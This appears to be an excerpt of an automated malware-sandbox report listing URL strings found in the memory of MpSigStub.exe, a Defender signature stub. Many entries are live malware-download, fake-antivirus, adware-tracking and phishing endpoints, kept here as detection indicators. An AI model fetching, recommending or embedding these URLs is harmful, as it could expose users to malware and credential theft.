Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://smpcollection.ir/poss/doc/purchase.doc
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://sndy2kungglobalinvestmentgooglednsaddres.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://sneak.bananamikubanana.com/pc/page/set_reg.php?afrno=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://so1.5k5.net/interface?action=install&p=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://soft.trustincash.com/url/config.xml
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://sokyoss.drelshazly.com:8080/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://somnathskider.com/wp-content/themes/oceanwp/assets/css/edd/msg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://sondervisual.com.ar/cnt.php?id=7314582
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://sprout17.blond.av4610.net/set_inf.php?id=movie_ef.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://spy-kill.com/bho_adult.txt
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://squash13.navy.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://srmvx.com.br/uploads/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://srv166997.hoster-test.ru/decidedly/barrier/barbara/seem/phaytd.dot
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://srv87992.ht-test.ru/west/excelz/index.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://staging.stikbot.toys/24.gif
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://start.abauit.com/logo.png?v7err
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://stat.t2t2.com/log/log1.asp?default&user=
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cn
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://stat.wamme.cnxv
Source: MpSigStub.exe, 00000024.00000003.6328862944.00000197A3361000.00000004.00000001.sdmp	String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://stilldesigning.com/wp-content/themes/stilldesigning-2014/langu
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp	String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://sucesores.com.mx/images/logo.gif
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://suckjerkcock.date
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://sundsvallsrk.nu/tmp/lns.txt
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://sunrypero.cf/document5.doc
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://superbit.rs/wp-content/themes/one-page/js/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://superdoor.ch/media/jui/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://superfast.com.sapo.pt/fotos.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://superkahn.ru:8080/index.php
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://superpuperdomain.com/count.php?ref=
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://sustainabletourismint.com/la)
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp	String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://systemfile.online
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://systemjhockogyn.com.br/boa.php
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://t%69%61%6ejinc%6e.cn
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://t.amy
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://t.cn
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://t.co/
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://t.tr2q.com
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://taggsalimentos.com.br/pdf/login.htm
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://tak-tik.site/crun20.gif
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://talk-of-the-tyne.co.uk/download
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://tamus.cz.cc/el/load.php?spl=javad
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://tbapi.search.ask.comxb
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://techwach.com
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://temp.hbsouthmomsclub.com:8080/gnutella.js
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/QuanLyGaraOtoDataSet.xsd
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/SampleProductsDataSet.xsd
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://tendancekart.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://tenillar.com/ko/pos.phpmethod=post
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://tescohomegroseryandelectronicstday2store.duckdns.org/office/
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://test.ru/botadmin/index.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://thankyou.orderreceipts.square7.ch/applica.exe
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://thehairhive.ca/meg/retwesq.exe
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://thevgjhknjkstore.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://tiny.cc/Tiktok-Pro
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/glpdpd4
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/h7okabu)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/hop4az9)
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jfrwrhe)
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/jy69pnw)
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://tinyurl.com/oc725yj
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://tirb.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://tissueling.com
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://titiaredh.com/redirect/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://titulospdf.ddns.net
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://tjuegost.info/downloads.html
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://tldrnet.top/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://today-friday.cn/maran/sejvan/get.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://tokziraat.com/templates/kallyas/images/favicons/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://tonisantafe.com/wp-content/themes/lobo/woocommerce/cart/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://tool.tesvz.com/images/nxz375.jpg
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://topiclab.com/wp-includes/css/index.php)
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://torscreen.org
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://track.wwwapps-ups.com/stats/xstats.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://traderspusers.hol.es/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/625986.png
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://traducerejuridica.ro/tenlxhlzpagc/D
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://traff.step57.info/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://try-anything-else.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv1.ws
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://tukangecuprus.com/cr_file_inst.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://tulip45.sepia.adulteroero.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://turtleone.zapto.org/out.rtf
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://twister.agropecuaria.ws/agro/twister.zip
